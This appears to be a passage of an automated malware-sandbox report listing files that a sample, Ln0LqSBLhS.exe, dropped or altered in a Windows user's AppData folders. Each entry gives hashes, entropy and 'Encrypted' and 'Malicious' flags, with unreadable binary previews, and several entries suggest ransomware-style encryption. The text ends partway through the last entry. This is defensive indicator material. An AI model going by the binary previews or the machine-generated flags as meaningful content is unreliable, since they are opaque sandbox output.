                                                                                                                                                                                                    Preview: ?C...i...b.*..Q&............?...R...Z9A..m.F.2.1..VT...W..D.R.....4..X"...Y..ChL.*4.H...R..RgRe.....,pL0L...^W.%..]~+.s`...&..X5b..]4.+.$..*......B..Z.?..Z....N..9..p...a...........fJ..G..p..t......{........+...<....tR.:...q...N..../O..3./.O..;s....C.*..B......H5.I..%..T.j.G...b..`.2....l.m..!.....\H.<H..,-#.}.;s@FJ...|.)f..._.].2l...1OX.%.....x...\..cCd.p}.e..`.n.i(|.^7.\b.n...HT.I.L.SL....`....E....z.D.d...Pf...c.iF..A...V.o.#..yo.....f~t.:D.d..)8Qc.........vV..j.g..g.."............8.P..0..o\..?........'-.....mn..oDu..t.n".......Zb;....q.4F..&...N9...mT.......v.o....;.^W$..z.%..I.2n.NG..3.....$.."#*.b..(...............`N.+....a...2.T..v......7E.a.GQL\..".. T..U.c..wi....2.q..?'.U&9.V..i..=...cBn...Q,..D-..>..d....?..t..p.t.e..........p..o.D.j-6..M.~..o...m...o>@.:d.b".7.)L..;..p..x#..X....m'...Y....f)....d..QEdxo...J..Y....6.^.Is...?.....X:...Tk.a.Dv.u.......@.....%....-OC.,.c..C.f...P.i%.ea.UY...3. .._....I..E..H%..p[......O1.... t
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2019-06-27_172300_6208-6360.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):21183
                                                                                                                                                                                                    Entropy (8bit):7.991113795696555
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:47MIB1ilUld0Fy2pFPd6ln5r7u/9Qh8KTTy2iJXq5ccuLcDV1PAZTGyJOwaRUuld:47dBWUld0FlVKnFBh8KTdiBMccuLcDV5
                                                                                                                                                                                                    MD5:DA4199FAD33139E75C4CAF71DA133FCF
                                                                                                                                                                                                    SHA1:41F4AD1BDFC8D5D9F64DAD20A8A743C1D453BDAB
                                                                                                                                                                                                    SHA-256:6F6411EE7C275DA117B603FF0BA1F5C1E7A21C1C238A7263FC229B618D5C5A26
                                                                                                                                                                                                    SHA-512:137F5043826B0790462851762CFEFD29A0087CC548BA267BAE9AD3A8D57EF4CEE62B28A530EF96A0B20D04EB297D0FCF4201C5E43B1E61B0F7EAEE27DAEDFDBD
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: GT..9U..wC....5.j.O..Cg....'...V?..{ys.z....V[./..#G....,t)j......a....jdr&......w9u...6.UP,...X.Bd....E.L`$..Z.z..^.aup1s.20...->..Z......L...r....]..!.\.'%.^...*$..iF.6.cwQ....7{.....`Q.{m..Q&.......dW;....'V:1..`..V...$.V.{.]....|.O..1vD.{.#..j.RGD.8... 2,~........v..G}..0..^..Ms..B@o.......:6..x...z....zd.7.&...@....M.W..E..g....5aV. ..$...(.\....Q..H.UF....ijI.O..7..-/.hE..#.tb......|.b.i...r.P/=`? C.........+.\....;...6..g.....r.........a....*..'..N./=q.N4.A-.(rDW.z..^..}".........8&G.f..B.dJ....y/.O;9.....0/.[.k.@...d..2.;..-.h....h.n|...P.a.>....K.....&c..M....R.Zo!...6t...(........].81.b...X...c}.._..U.zym<...v.W...%..S....\...O.......\.{.c}.K...f^t{.O...P..s.......1..m..%.wj../.'>5...>.V........*^5.R.......Dv....,.....k%..#...7\.....3/.Z.N...n...Gg.B.r.n... gs.....e......O.....".W..C...7I.r.X.'.V+.....C.....l...sp....^.....1."..{.ZQm,...;Q.....P^..K.SN....L....d..M.z.hK.{|..V.Bmp.!b.}.z...`$Fw>W_P.."Y..9D,..XW......9^...6/#..o.x\.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\parentTelemetryCache.otc.session
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:DOS executable (COM, 0x8C-variant)
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):20809
                                                                                                                                                                                                    Entropy (8bit):7.991169197236116
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:PfR4bJfRidwMuT+EGDEaM4LzWOQzjFE4YqsYMa8gff/Ba:PG8lEG4at31QzjFE4Yqsra8gvk
                                                                                                                                                                                                    MD5:D5EC6DA5F19C728E3B21E2081D160F5F
                                                                                                                                                                                                    SHA1:3FEF2EEA9D99EC80EBBBA38BB9FB7002E7565B26
                                                                                                                                                                                                    SHA-256:C12C409DC54B35B757BFB5A5AB2B85876775DDFB33FB5AB66906AB221F3D29CC
                                                                                                                                                                                                    SHA-512:96017F3F108DCBD49FCDDE763DA79A4609792E75459DD7AF8A518BE4AA472EA47B2FEE387FC1EE2A133F9750D0BD536DDC7854FF044158491A5181BB4035610D
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..:__. ..O|E.(u....cI[x7......si...$..z."..x..a.Zk6...^.H...D.^~.9..D.2.....?....z......~r[....b)..2..0.......O2.![..k....4&..i*...].....y.<..1.N4....r...).....bt.{.M&d.Z.<"......).S.V.Pb.r.....f..P.W~h....L....-U.y..K....9....(.(..{a.v.Q.F+.._.OC..^.od.$..GU.....G..a....t".{........5..Q..:!.......Vi.@...Ri"...1nH.wt."0.! ..v....:6..+..w."o*..Av..8-..z.....1.F.x..=3..!...>c=@.9.P.9M.j4...9..........y1.<.3.;.2..0..B:.{.M.?9 .v..'...._-.Y..!.%.....V#NT..)....>..n.z..E....z...........{.&....~I.../{.."..V)v...T..kM._I.6..F..V..@6..j....Gs.OP.F._......7.v...._..YgA....y.l.3.E.J^U.....~..F...e...]...V.D...|........@:@....,.E...?.X.v=DV$IMT.4..^...q..3.3?...t.=...c".v....y.F).6........::S>Ma..K..6`t.W....../K...YU....E.Va.[....+...U.s*(*9d..s.r.&.....n.f2X..o.<..0/H..z.[B$w3..L/..H.#..1*N..J...........j.......k.Q5^<...'........!|"......._.9.....w.Z..........f5@..B5D.4RK......@m.%O.)_.w.V...[..Ps.+y.....0...........;...4._Q...t).
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\userTelemetryCache.otc.session
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):20809
                                                                                                                                                                                                    Entropy (8bit):7.990808606434186
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:8WHacvhnVkqxHcm9PyzjnvHGmc7ZUDLujuqgzg6aoNpWq5siClDE4z5SD1z041P6:8IhnVkyPyzjvQ7ODL25gzg6LpWYsiCN9
                                                                                                                                                                                                    MD5:D01070FCEDB03E48C51A3132382294CC
                                                                                                                                                                                                    SHA1:DF66D7F6DD11CDDB74E80AF5B20D4E35509EE1E2
                                                                                                                                                                                                    SHA-256:3C88A2979235C9DA91DB83DF14F2FD290E6A4F3D4EA522A99D2353538BBEA456
                                                                                                                                                                                                    SHA-512:92011FA1BA281F70FE8EB4E37CF073AE9C986A510F1C4D6E40EC343224EB394FE048514E97E30C6F74D8FB030DC86F45623FB9176389836E37043BCA5CA351E6
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .<..pr.".r.O.t...../.d }.6..B._.;B...$..o../..Z .P.DI.t@Y+"............`z.m$o...2..\>+.v.m.g..<.k_.....tT..:.".1....g._tM#1..`w...'.7.r.G.R.kK,.&.0...N.#........x3kQc7.y.,Ak.X.g.?..A.....^.V.l..4.)Cv..........m. .{.....pF.A2.g...sg.xsR.t..(y'Hr..~....&.?.4.....e.Mm...@;..rMA......B...;.............mYZ....O.Y.s...7...E..aM..."Yb..D..*Q'...h../:Ua....M...b...m9..=D......K.^..1R."....N...t.M..WE.n.n"<...l....H..A.E.....F...sR..:.xU4..SX..Ot....9.....~.X.!..x.X.z..^....z.[.-.x...>..&..1.,K.2to..mK9.7..Y,.E...4..:)..Z..cU>a...t......w.N...1...T.kc$...+.x...fQ,.......7L.:.Lj..U.g..Bb7Y...e.C .....p..V.........jB..5;....u+......H.._ ......;.s..]....*...v.~.8.O..E..md {.qj.S=W....$..e.....?A@..O...r,.sS...#7...b..|K......K.%(..7.w+"...d..}...+..<......._8O.......(.e..B...id.........5.L..*]..n.*.'....p...G......6o.u]...1r......@.l.S.Z..#....d]..SK&..T.gO....V..r.....t...........wh._46....g"..`h#...u>.E.....p...>[.%......@K.,...t..y.._]..W....-..B>W.N
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2626
                                                                                                                                                                                                    Entropy (8bit):7.91661476347085
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:rDEhI0PitXNQMPoaBAi+eh1WojXCniOVHaxG7/MC/hvDl3bu1xD:HrNtXvPoaB6VHMG7/MC/Xbc
                                                                                                                                                                                                    MD5:3EAC147560C58DD839BEB4443AE4D159
                                                                                                                                                                                                    SHA1:FD0829BBCB67F94648310B6AC7F00CB693833B57
                                                                                                                                                                                                    SHA-256:D38477CC79B002B63D2429410ADCE20E4E722B1FB410B96771FFAC0DF0A58C5F
                                                                                                                                                                                                    SHA-512:DCCFE30281D4615A89E45F50C5CC061220762C4B715B7B9D2BF912D1CED8BE196738CA612AA4856079529A07738B10670C0C052C355C13B3F4EC040EA6871169
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...C..0O....5..n.....!.M..X..Pd.:.= ..Q...M...../.`......&...d..L3~..m....Q....m...}w!*+o.X.....{..<s..S.5..FGcm.....3.Q.."K...N.z.IJ....4.HG..)s..d.u..G....).E...........w:D...sK.m]F...b5..w2e...T:X..G....b...tFV.;{...+..is]2.^41....iTe..K.u..Hu..7.a.=~...j9+"bD._..-....!.....N:..NQwB.....j....T..1.R....{...4.<N.w.}..4.YE.bO?..O.k..VUu...t...n- 4m+...s.,.1%7.n......\..B ..E.3.L<....L.^..A....P..S.E.L@.....n..I.."p.Ys..fK..v.jN..X\i...H..@[.f.F..M.X...h.7...yt.4..L..aj.......-ZF....G....D.`5..SEzcLF..W...#aI8U.o.....^..../....g.3.&LV%..)..'~`vu.y.R......F...u[.r..l.9W....j.kR".o...V........V.'_F.KB..{v.5.....5.G.....5<t..$.......0.n.>@..)...?.S...7.s.7...D..N...zjW..I5'.Sypy)./).Zh....V(.A.~..v......T.....j..v...;.r.}A.h*...J...)..?;...Xi.sZ.g..rF..~e.hr.....WVZa.;..JR..U.%...|d.4#..t@u)C...et~.g..J>./.s....0...(...O+8f.....)..6V.."."]..F...U...~..D$..rZ...z.lGdi.S.Y!.O.4%........h5.3f...e.X...oH.&..o..6.e.^......M......LP.L.....~.z.z...I..(..=...?..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3013
                                                                                                                                                                                                    Entropy (8bit):7.934924400473442
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:CiNzqV0s61oAakd7v/X2cjUEtsR0GTyog+HqVvcNw80dYt1rkbMgRB7sy2frD:ly61oAakd73VQXRfyozHGcj0dAabvRxI
                                                                                                                                                                                                    MD5:EE239A74386FFA4524334A17CD164EFE
                                                                                                                                                                                                    SHA1:88E12928F9D52A079B7B1F117C2DFC472144F84E
                                                                                                                                                                                                    SHA-256:E7C7E8190EF9C6EB9BF163140AC7067AFCADB5DEFD698847C672B029C55A1A42
                                                                                                                                                                                                    SHA-512:EBC25169115E41257269936BEB0238716C894AB407482028FF9B8B24D297F82F262A193F16CFEEC1185BFBFB828FB2DCB9F8969E3BC361DA1CF8CBFE1DDA2B77
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ,.V..3..a....;.Uk6........)o....}FQt....Z....c...j~.ZG.!....<:...*$Ea....MI.CGRe:+....... ..Z;..L.N.....K,.I...10..T.h.`.P....Z..W.........7Q..{.d...^#..m.....]4...<*....iQK.{5.}."E.s .I&....r...p...k.N.....+..+.N...a<J.=@F.....v=.....k.`..x...G.+....Z......!..6..T..4.>..+d....vi.3...GO.......I.j....{.....F.l.m........z....jb}..<....@...Y..9..'.^D@Yf.....l6..Jju..P-Gh.bq....0..df.c..c<2.eK...5........w.6....F4.l.H.NwT.....'..q....s....x$&..b.....}..._..g9...o.3.r..r.i..".... ..'y.....Q..c...7..Td..e?o.f.R..../..J.....@.........k.w.^.xU6.m9.........&........lL9.R. ....#D....?"h.g.....A.p>........{I-$.........X....Xr... (..g].........O.~..w}.B..&~.&>hPM,.l...._...F2J.LX.AJ..@p.f...L..}.\.q.....hUjmf.)<.#|...;.D..]7.?B.A...k.6.Hh.C.8Sv.^..,h...C..jX.!..-O. ....nAq=_.7&........'..C\i.PMtJ..625F.4.C...].=....-.|~..G(\.p>.5.!...}<..x.JL..V..)..X....D.e...vb.@R...hg.g@.\.....q..zH.(.....pn...8.....D.....DB....E.|.qM..%........
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1530
                                                                                                                                                                                                    Entropy (8bit):7.832637377636281
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:/9w+kAXrkqsiwy2Vo9N/MKzR49erUbxvae0HWYk1ByD8Ehiup83m1cY9CPsydS2j:SAXrnsKAoL/MKzmer+xSWEp83MPCPsyh
                                                                                                                                                                                                    MD5:EF32AF1D6F410C0B41879C81735D0EB1
                                                                                                                                                                                                    SHA1:9AEF785A9116CCA06202E289A9D4D0E777878ECB
                                                                                                                                                                                                    SHA-256:64C70F76E1A21E934D9C5DC90CAABDAD30EA05AB5C864860C364ED0333C4A402
                                                                                                                                                                                                    SHA-512:68268BF645E9404550A16A6C4B835DA5B12F4372C585DB1AEF204D754AA00F822B36A2F61079888FFEC402D27B5B2447304291BA568550DE176EACC88C9BE153
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .R..#..E.x.?%P...z....ZQ.......@..9.....D.x&...V...-.|..E.....=nz...+.;..t.....I~!!H8.V.+C........z.S..j.+.+~.`...d..H.L4.C...J....2.....Q..Z_.H..y..._....n.. .?p m..>?u..P....{..yv..Y.. u...=..hU.F....|........+..P.^4. ....5.B.]X)GE...@. .h.....4...<./(...o..@......a.Z...D..g.?|.&.P......nE^...7...Y.....!/.o.......q*#. ..C...OM....,&P..B.{. K..<..4..V/.....@....|...6U._.4u......V...i....<h3.).(.+}[e....'..b#......TP.#:.b..4.=.;..i.(.... ...93N48.'....3_.g+=......l.Ir...k..J.......... .)..*.d..E..q.....G..LD5...........m.......~.C..H..K..6...9a......Dg.j....9........U).....7.M.....o..m.[..J..._.:K..:B....z...+..u-q.eNs....-._L:.x}..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}...TP.....XJ3...vN.rd*.?X2..(.....t....e..Z.....A.ym.w..U.w'EK;@w..99\...ui../..p....A.bjFd..;.n{C..Y.k..L..yd.#...W..Y\(..3i..0.k....znb*Ub.0..1....Jl.v.q+.|..F......Ts.*._.7i..0......`.0.......J...?;lR..z..A..@L.-..V.'...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_00.sqm
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1747
                                                                                                                                                                                                    Entropy (8bit):7.880975656350571
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:mpeN6WFDIVkEuODYrHHdTip5J1B+IOFbIQtttD:moNvJE3DAHHdepmFcQtD
                                                                                                                                                                                                    MD5:E33AAAE2362854CA06092E800ECA5685
                                                                                                                                                                                                    SHA1:614B036F348222CB3582030F4D4156BE5D5A0631
                                                                                                                                                                                                    SHA-256:99548443A2AF420067C316A7AF982F2BEE10D04573F91F01F112C7789E817ED2
                                                                                                                                                                                                    SHA-512:526A4C24D6236420BF86337FC9E3DD42C7D24346FF76AA58157C1CF3862E739B238494AE97BB01FE030FBE511EC1777CEA8FE3FD62584BBA224E2C81D11ED5B7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..3.A..f.V...*F.;..7...g.Z.J)..V(.x<... ..DFC0..A......`..}./w.)@..r..Rs...p.y .d....s.w..B3|Lk.[k.q.%.j..="ZN~.7.7.......'.}`j.......2.:....~.6o.P...S.?$....Q?..x.q>.....{...^... .t...K.....N....2........7.>.g...*.K:.d...bY.r...t...c..}...=v........"..y.D.....c.n.u<-....p$^."....R.....)p.{0T..#cc(N:.........%..[..c....0.....G.l.F.....0u....;.....aw^v.+......f..(%.@0.....&.j.3!Z.5Q..D.=..-~.*...V......VY/....b...n...J.2{....E.[..g8.uq..@...d.....k....p.......zQ..~A.F6i..V....D.(.,.kb....[.....o..._.3..7.y>..'.c5.R[>..c.W.).`;_kY.R..?.e..M....x.~c..d.M..:..G.zI]<.JE...5..|b.........MA..'.o.l..66.W.@+?.L.........MWu.^.S......2+E.;*y.<..^.........7..d.....X...........c.....t.V..[..x..dN...DL.t.(v....Nj....@ ....B......r..Rm.......$......a.....5+.N-.+>l'.:...u.y..C.0H^..Z%..W......9J.y..H. ".q.>..O..@X...d....GThW....I.m.<..gh;......{.{.o.m.3.e.&%....H\.u..3A......D.1..o_..i.sC...Q...1..g.p..fN.l.C....>B-P.5E..>...}h...K..d<..&0m..{.>t..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_01.sqm
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1135
                                                                                                                                                                                                    Entropy (8bit):7.810003710811573
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:YPQ3Wy4V2yNLknfiRoBd4SECovF0mLr71H/obvnAUFJr8h6+Aw9PwCQZXbD:oQ3Wp7NLk6O+phvZpfXiJry6+Aw9PwdJ
                                                                                                                                                                                                    MD5:F53AA1F2B706416B4CEFE7166DAED688
                                                                                                                                                                                                    SHA1:8F5BA01AC2780DE71B6A06E9A70C600453819A21
                                                                                                                                                                                                    SHA-256:0C83441C8F120BBFE84FDD3B776843A5DF782995393B09FE948452FFF78CD98E
                                                                                                                                                                                                    SHA-512:5825ABE0B8A8D350EC880E1DB79F73DC51DA3DC2600408BA6B3C53D32B49F3A27EE99D255CA7F950F642CE6AFBFB8B07226DCF84F6D98464CDA6B3E1F6383E3B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: m.$Q.......q...XbH......p.O.....pv....=:$o....,c"{Ari}.=~(.....j.1!G...m..`.#..r>....>.w.!.n}$.*.Cqht)."Z....m.=Y..m7..&G.....U..$Nc.<.=....*4.'3$d.+vq.......k{....|....0._z.1.S....1v.....H...+....]....^..+.....6...?...w...h1..JR....1....N.O.0X.&....#Tf.ah.i..O.M....Y.*X".....B........|-...>.W..G...<5..Fd..-p.*...;).U......ok..+...s.......h1.Sz....7e."..."..g#P.]..>.i([#B..QR.gT..?.aKy.9..^.].".l.W.T...<.....H... .,w.4..\.awB.R...8....3.(.KG=..H.K....\..o.d.+.h?VN}7BR.<......(..).;.t..h....@..P.-.,...4..e.^.R.....S.Hhr.f.l..;cZc......TX..L......(...^3.8.......kE..:...Q..S.T.t]#..zo9..^..P...0....>).{z..U.......d.Y......4..0.+I...#Q....F...1}.Fol.dg.3..p....OR..5....7w9^.r.....B~;..5.......%...9.T3J.<......*.Wr.?..&....j...l..wM..G.~<.U).Z.P.H.$.x..$M/.y^o..[..*....4C...L...f..{.B..2,...4.C.f...&.j.....7.$.h...-7.C.;'.2...].L....*.t.. .5Z.....7.m...+0..7..9j.s..T..2.pP ...l65.E..M.}....`Bj..FW..!o4.&.......5......y.....z...U....WR-F.T
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_02.sqm
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1033
                                                                                                                                                                                                    Entropy (8bit):7.805393295089041
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:wrS8j6vEuzAaFsurhgedsUxmEyU9J/3nIfChbD:wVjEEuTT9gY46J/I+D
                                                                                                                                                                                                    MD5:3840D24F9F7040452025FFD0AB6B8025
                                                                                                                                                                                                    SHA1:738AAFDABD62AF6F78FB8F9700FBE45D05FEB7B2
                                                                                                                                                                                                    SHA-256:2E9CA26BD873A06A3FD3025D9588906262A5EF1BF7BDCB529E4BD48F29CFFB72
                                                                                                                                                                                                    SHA-512:D7D84EC2DDC1AFCE183F7F28F564A827B43010D4ABD5FE2087158663CD275489BEF19363D20F42DD8D120F9FED8C7C4E4C89D9C3DF04FA945A3C9F35EF5E7E99
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..5..#B.=...S.*h27.X..L_V..m.Re...i.p..W,.^...'...&..4..l..3p%..'..H.".i.i.....#...?U...lao 7..7A).V.8.8]d......bP..k.5..z...on....v.........Z..9..A~.J.....5...R.~..&?.TmV.6.....+..dT..3..p...0....e.j...F.#bN.3.*.]*%4.=.a."..,p6e.*G.$F..l....3.......c..K.6.y............T.Vz..Mc.Y.zXB.]L.........R..E+,!..:.F.a......!.qb.&..=b.....>3......z.. .zZ...So1.>...-.7.T....O.1.]...p....f.q...^.9.O..+......%,.7.;_...o.!lV.....x"KW.;.....F\..XF..6....>.#..n...2u...1..:.H....Y......X..'._........rgP.B....d...{.q.......:9.].....P.A....M.lJ....(.qPu..kZ.}.o...f....S.....h.(~T.T.q..,...:V/.z7..v....|..J...a...Z.l.V.y...O....f.:...YAH.G...J..f.Y.....Qdin....;...v.).=..m.!..&........(35J.........._f.U(.f........?.l.._eS..s... Hl!`..$....n..K...2...i..K.%.T.g...k.M`d'...i.yB..".5...[/.D*.2s.m:...IG...2m@.....N....g.s9s...IX.a*Yo.=....!N"..$.. .O1.f..:rV|.`.;.}.-..LU.<<...>.D./...V.../...^.\`..d.h#..D5.z/+.Vl"...C5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A6
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_03.sqm
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1225
                                                                                                                                                                                                    Entropy (8bit):7.801364397482789
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:nTEgwLp0UO/lzvM1We14R2jEGSGQtlIEkCAMHawVJzeMCbW7cSDvgg7bD:n3MXspOWe14IovtNVHawVOIog/D
                                                                                                                                                                                                    MD5:DBD2645AB8DDF9AD7CFA038BBB966364
                                                                                                                                                                                                    SHA1:BB3686DC1C147B60EFF9BDAE759745621F89212E
                                                                                                                                                                                                    SHA-256:B67E277A94BAF0BE83E7F9FE41C049A1ABDF048437DB1C9B5896129149EC04E0
                                                                                                                                                                                                    SHA-512:F6E5D76016CF2BF131C14234F5699382442BD9ED1DE61B10E9DE29EFA46B0B4A06787E3C4240F6B781AC201DD556AA18DE0B91488F7124DCDA0114198826B62E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...u.?.a..e....C..PY..EW.JO(.v3.?.Z...iL0....v..%!._...A.!%h.....+.............6.@....EG...G..fy...2i..........1;.e.ul.8....b.........jU..2..J..D..Q......l..J\NQ.=...~.u:Nr.<Q..G.[,.!..u...o-f.@....@(...x;...`5.......8nb.....1x]..l=RO......R4'"c..K^8......8zF/....g..{f..xc;gd.)....*...C.u?....w.4P...42."..x5....Lu.0...qK.So.l...I........N|.4_.[..E.......ww..]....'..@e3U..X2Le.........'.T.....a.gQ...|.y.z...(.eg.v....[..0`..>.@..HU).....t/..E6`.!.X..#r. 9zj.9js}.q..~....).t[ _'w.!...l*......>..[...p...].._........2..6......jy.C... ....l.....F.v......Y!....D.=.6..._.~.e..#!c...5..;.f.p/.!@E.'...fO!...o{.oR...V..sq[..O.|H.y<.Q......0;(vmT..-@.lS..9.5.y...d.i?..<x......\ac;](J...&.&.......kU.z..O..r....S..R.q.R3..\........"&..xyP[...2)6...+.&39,L(.~j.CC.v..P)........6|x.Oa.....)..Ed.F.8E...b...x.GPsL.S......o5E.....vS..YN}..'>l..d....|.,..A.....u....u!!l.A....p..s..X......v.rT.....ht...........a..)..X.....-{......|..V.../.. ........X......
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_04.sqm
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1095
                                                                                                                                                                                                    Entropy (8bit):7.780848407997952
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:W3l3jipYnnBJu+zevtqcxKa/D6ce2IiZCKGn5bD:W3V7bjzjcwabDe2jZCKE5D
                                                                                                                                                                                                    MD5:BAA9865143C5884B0163128EE9DF9474
                                                                                                                                                                                                    SHA1:0580CF4E2A16B97A440C31191A506F9399D00F5F
                                                                                                                                                                                                    SHA-256:4C27A4C0330C914F859A8CF9ACBBFA814CF09A90FD65C7D50B4FA4627B925CE5
                                                                                                                                                                                                    SHA-512:7607AE8409FDB476E7B8FF07E90B2C11E06F158A8F09BC2916D11FB1206B29C5D0CF880820AD12BA844D6A92774422069D1095C0B45231277D3D505D41C9BFCA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...o.o......&.{...4.n.....PC...!&8...:.v..D..;..3..m.kV@...f@f.. <s...F.W.Q...yr.:N....Z.,.@..w=3....6...J..uK..iI...&.....>.k\..0..b.. p.&+_........9.[>.6....[.q....`..Sn......G.>.......q.2...A....V" ..%.?..%.....b....}..n...P}...3k..............R.Y...(....~.:...V....1O..k%gb....l..37..,Pu;..........\.N..c2.j.h\....M.....N.Hkf?..|.....B0... ..m.f.6.5..9...{...h6....75...#V.p~v@...A....T.RqQ.Sa-.R.L.L_..{.....clx}....s.N...h..e..bz."....%.\....O4w.....M..5.......%r{.nr/*.t.....<..\ld....w.....{@.Y..........hW.J.?.;..v..,.n.[._...B.or..B.x.T...S......h..;.....>fr......A....A...?.....&Fu..sm..e.+..T...(.....t.......A.iG{...!k...<BC..iS.R1>...h...~FI../...Y...R.`..Y...E.[.............l#..4..I..g....5!/.."...fi4T!p...=.>... .~w....#r..`G2M.g..}.......=3..[.i4.e..S6...w..a.r...../q...e~@Nl..Sak.b.CF.V.x...&....+T\h.....<.DH.E..}.^..:G...=...%dI..^..,#..'.R(3_XW.k...y.5>h.#R.K`4.U'...}[r:.7..Cz....{Y...#.mG.>.=....Rr.t...w....J.A.,7-
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_05.sqm
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1073
                                                                                                                                                                                                    Entropy (8bit):7.795966076361011
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:cw4D83mnrCdClDf0rEQhFnQYbPjS0ONNnXbD:aQ3U+dCl0ZQGPjZONxrD
                                                                                                                                                                                                    MD5:0B5576CDAFF261DB65C6F5ACBB328F9F
                                                                                                                                                                                                    SHA1:E804FD17838C619AA919FAF51368DDBBF7CD6643
                                                                                                                                                                                                    SHA-256:5794060AB0B68722E849D08FCF6E9DD59D8CFF8D4EEDF01CB6F324356671CEC3
